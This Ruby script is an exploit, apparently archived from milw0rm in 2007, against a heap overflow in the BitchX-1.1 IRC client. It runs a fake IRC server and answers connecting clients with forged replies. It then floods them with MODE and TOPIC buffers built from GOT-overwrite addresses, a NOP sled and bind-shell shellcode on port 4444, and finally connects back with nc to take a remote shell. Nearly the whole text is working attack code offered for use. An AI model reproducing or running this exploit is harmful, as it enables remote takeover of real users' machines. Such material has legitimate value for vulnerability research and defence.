#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
require 'socket'
#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+
#metasploit linux x86 shellcode bind tcp port 4444
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
"\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
"\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
"\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
"\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
"\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
"\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts "\n[-] listening for incoming clients..."
while (client = sock.accept)
ip = client.peeraddr
buffer = client.gets
puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
#Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
":0 001 #{nick} :biznitch-1.0\r\n"+
":5 002 #{nick} :biznitch-1.0\r\n"+
":6 003 #{nick} :a\r\n"+
":aaa 004 #{nick} :a\r\n"+
":aaa 005 #{nick} :a\r\n"+
":aaa 251 #{nick} :a\r\n"+
":aaa 252 #{nick} :a\r\n"+
":aaa 253 #{nick} :a\r\n"+
":aaa 254 #{nick} :a\r\n"+
":aaa 255 #{nick} :a\r\n"+
":aaa 375 #{nick} :a\r\n"+
":aaa 372 #{nick} :a\r\n"+
":aaa 376 #{nick} :a\r\n"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "\r\n"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "\x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "\x90" * 40
evilbuf<< "\r\n"
for i in 0..5
client.send(evilbuf, 0)
end
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end
# milw0rm.com [2007-08-27]
